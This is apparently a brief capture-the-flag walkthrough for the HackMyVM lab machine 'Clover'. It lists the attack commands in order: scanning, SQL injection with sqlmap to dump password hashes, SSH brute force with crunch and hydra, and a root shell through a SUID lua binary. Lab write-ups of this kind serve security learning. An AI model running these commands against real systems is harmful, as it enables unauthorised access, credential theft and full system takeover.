https://hackmyvm.eu/machines/machine.php?vm=Clover
Scan ports.
nmap -sV -sC -p- 192.168.56.99 -oN ports.log
Log in ftp anonymous, found 5 text files, but no useful.
Scan port 80.
gobuster dir -u http://192.168.56.99 -t 80 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.txt,.bak,.zip -b 401,403,404,500 --wildcard -o 80.log
Default credentials can not login phpmyadmin. Check /website.
Check source code of /website/index.html, found a hint about "ColdFusion".
Scan port 80 with dic about coldfusion from seclist.
gobuster dir -u http://192.168.56.99/ -t 50 -w /usr/share/seclists/Discovery/Web-Content/coldfusion.txt -x .html,.php,.txt,.bak,.zip -b 401,403,404,500 --wildcard -o coldfusion.log
Open login.php, use some common credentials to login, failed. Because we have no other hints about credentials, let's see if it has sql injection.
Burpsuite capture the data, and save to post.txt, then use sqlmap to check vulnerability.
sqlmap -r post.txt -p uname,pswd --dbs --batch
Then we can dump the password hash of asta.
sqlmap -r post.txt -p uname,pswd --batch -D clover -T users --dump
Decrypt it online, get passwd of asta, then we can login ssh as asta.
After a lot enum, we can locate a password hint about another user "sword".
Generate passwd lists using crunch, and bruteforce the password of sword.
crunch 12 12 -t P4SsW0rD%%%% >dic.txt hydra -l sword -P dic.txt 192.168.56.99 ssh -t 64 -f
After log in as sword, check SUID files.
Run deamon.sh, in fact it's lua program.
We can get root euid using lua.
./deamon.sh -e 'os.execute("/bin/sh")'
Now we can read root flag.